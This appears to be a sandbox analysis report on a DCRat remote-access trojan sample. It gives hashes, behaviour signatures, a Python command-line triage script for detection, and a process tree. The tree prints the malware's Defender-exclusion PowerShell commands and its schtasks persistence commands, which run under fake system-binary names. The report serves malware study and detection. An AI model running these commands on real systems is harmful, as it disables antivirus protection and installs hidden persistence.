Analysis

  • max time kernel
    147s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-12-2024 18:32

General

  • Target

    JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe

  • Size

    1.3MB

  • MD5

    378006af49b98b659391f3ed91761531

  • SHA1

    05b2ce29ddea4f38f5f45bc4487d16f5f093cb05

  • SHA256

    25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a

  • SHA512

    f63dcef41d20703613cb5d7e64166b999f2e8b2f35431111b5b631da54cb4a0cfbae19e19ac984e9afef63ad0bd2ca36264557f9dd2a59a10ffb1c874aac261f

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

  • Dcrat family
  • Process spawned unexpected child process (39 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro. In this run the unexpected children are the schtasks.exe invocations listed under Processes.

  • DCRat payload (12 IoCs)

    Detects the DCRat payload, which is commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell (1 TTP, 15 IoCs)

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes. In this sample every call is Add-MpPreference -ExclusionPath, one per dropped copy of the payload (see Processes).

  • Executes dropped EXE (12 IoCs)
  • Loads dropped DLL (2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 10 IoCs)
  • Drops file in Program Files directory (15 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • Scheduled Task/Job: Scheduled Task (1 TTP, 39 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here each dropped binary gets three tasks: two MINUTE-interval triggers and one ONLOGON trigger, most created with /rl HIGHEST and all forced with /f.

  • Suspicious behavior: EnumeratesProcesses (37 IoCs)
  • Suspicious use of AdjustPrivilegeToken (27 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
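
The three behaviours flagged above (Add-MpPreference exclusions, schtasks persistence under system-binary names, and w32tm /stripchart used as a delay) can be triaged from command lines alone. The Python below is an added example written for this page, not code from the sandbox or from the DCRat sample: the command lines it checks are copied from the Processes tree, the "NightlyBackup" line is a constructed benign control, and the set of masqueraded binary names is an assumption taken from the paths in this report.

```python
"""Stateless command-line triage for the behaviours this report flags.
Added example; sample input is copied from the report plus one constructed control."""
import re

SAMPLE_CMDLINES = [
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\Program Files (x86)\\Windows Photo Viewer\\lsass.exe'",
    "schtasks.exe /create /tn \"lsass\" /sc ONLOGON /tr \"'C:\\Program Files (x86)\\Windows Photo Viewer\\lsass.exe'\" /rl HIGHEST /f",
    "schtasks.exe /create /tn \"lsassl\" /sc MINUTE /mo 13 /tr \"'C:\\Program Files (x86)\\Windows Photo Viewer\\lsass.exe'\" /f",
    "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
    # constructed benign control: real System32 binary, daily trigger, no run level
    "schtasks.exe /create /tn \"NightlyBackup\" /sc DAILY /st 02:00 /tr \"C:\\Windows\\System32\\wbadmin.exe start backup\" /f",
]

# Names the sample gives its dropped copies (assumed list, taken from this report).
# Idle.exe has no real image file at all, so any file by that name is suspect;
# the others only belong under System32/SysWOW64.
WINDOWS_BINARY_NAMES = {"lsass.exe", "csrss.exe", "wininit.exe", "spoolsv.exe", "dllhost.exe",
                        "wmiprvse.exe", "conhost.exe", "lsm.exe", "wmiadap.exe", "idle.exe"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def is_masquerading_path(path: str) -> bool:
    """True when a protected-process name sits outside its real directory."""
    p = path.strip("\"'").lower()
    return p.rsplit("\\", 1)[-1] in WINDOWS_BINARY_NAMES and not p.startswith(TRUSTED_DIRS)


_EXCL_RE = re.compile(
    r"Add-MpPreference\s+-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+"
    r"(?:(['\"])(.+?)\2|(\S+))", re.I)


def parse_defender_exclusion(cmdline):
    """Return (kind, value) for an Add-MpPreference exclusion, else None."""
    m = _EXCL_RE.search(cmdline)
    return (m.group(1), m.group(3) or m.group(4)) if m else None


_CREATE_RE = re.compile(r'\s*"?schtasks(?:\.exe)?"?\s+/create\b', re.I)
_SWITCH_RE = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^\s/]\S*))?')


def parse_schtasks_create(cmdline):
    """Map schtasks /create switches to their values (True for bare switches like /f)."""
    if not _CREATE_RE.match(cmdline):
        return None
    opts = {}
    for m in _SWITCH_RE.finditer(cmdline):
        val = m.group(2)
        # /tr values arrive as "'path'" in this sample; strip both quote layers
        opts[m.group(1).lower()] = val.strip('"').strip("'") if val is not None else True
    return opts


def triage(cmdline):
    """Findings for one command line; an empty list means nothing matched."""
    findings = []
    excl = parse_defender_exclusion(cmdline)
    if excl:
        kind, target = excl
        findings.append({"rule": "defender_exclusion", "kind": kind, "target": target,
                         "masquerade": is_masquerading_path(target)})
    task = parse_schtasks_create(cmdline)
    if task:
        target = str(task.get("tr", ""))
        flags = []
        if is_masquerading_path(target):
            flags.append("masquerading_target")
        if str(task.get("rl", "")).upper() == "HIGHEST":
            flags.append("run_level_highest")
        trigger = str(task.get("sc", "")).upper()
        if trigger == "MINUTE":
            flags.append("minute_interval")
        elif trigger == "ONLOGON":
            flags.append("onlogon")
        # report only privileged tasks or tasks pointing at a masquerading binary;
        # a MINUTE/ONLOGON trigger by itself is ordinary admin activity
        if "masquerading_target" in flags or "run_level_highest" in flags:
            findings.append({"rule": "schtasks_persistence", "task": task.get("tn"),
                             "target": target, "flags": flags})
    if re.search(r"\bw32tm(?:\.exe)?\s+/stripchart\b", cmdline, re.I):
        findings.append({"rule": "lolbin_sleep", "target": "w32tm /stripchart"})
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for f in triage(line):
            print(f["rule"], f.get("flags", ""), f["target"])
```

On a live host the same two checks map onto Get-MpPreference (the ExclusionPath property) and Get-ScheduledTask, which is where to confirm and remove what the sample added; the masquerading check is the one that separates these tasks from legitimate ones, since the task names alone are deliberately bland.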

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_25b231411fd9b3166d4beab0dd8ae0cfbcf68e55baa52fd278fa46898e6e0a1a.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\Idle.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2420
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Saved Games\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2060
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YtdDrdHd9N.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1496
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:1636
              • C:\providercommon\DllCommonsvc.exe
                "C:\providercommon\DllCommonsvc.exe"
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2596
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1564
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\WMIADAP.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:592
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2452
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\csrss.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2120
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1096
                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2152
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat"
                    8⤵
                      PID:2988
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:2308
                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2068
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tYG4XGbOex.bat"
                            10⤵
                              PID:3048
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                11⤵
                                  PID:896
                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                  11⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1824
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EUl4QLAvAv.bat"
                                    12⤵
                                      PID:1168
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        13⤵
                                          PID:2828
                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                          13⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2008
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"
                                            14⤵
                                              PID:2664
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                15⤵
                                                  PID:2312
                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                  15⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2356
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat"
                                                    16⤵
                                                      PID:2092
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        17⤵
                                                          PID:2704
                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                          17⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3064
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\asjVMp8zxr.bat"
                                                            18⤵
                                                              PID:2628
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                19⤵
                                                                  PID:2228
                                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                  19⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1540
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X5jGqiFaSS.bat"
                                                                    20⤵
                                                                      PID:2396
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        21⤵
                                                                          PID:2524
                                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                          21⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2604
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jaxwQXfGLd.bat"
                                                                            22⤵
                                                                              PID:2240
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                23⤵
                                                                                  PID:1012
                                                                                • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                                  "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                                  23⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2476
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KVYyjDtEXm.bat"
                                                                                    24⤵
                                                                                      PID:1004
                                                                                      • C:\Windows\system32\w32tm.exe
                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                        25⤵
                                                                                          PID:1724
                                                                                        • C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe
                                                                                          "C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe"
                                                                                          25⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1380
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2700
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2876
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2868
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2912
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2860
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2788
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2600
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2688
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Start Menu\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2620
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:676
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2476
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2840
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2472
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1852
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:592
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1144
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2628
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2316
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1948
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1460
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Saved Games\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1836
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2936
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2828
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\dllhost.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2932
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\providercommon\WMIADAP.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:788
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\providercommon\WMIADAP.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:944
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\providercommon\WMIADAP.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1704
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1848
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:804
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1808
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2184
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
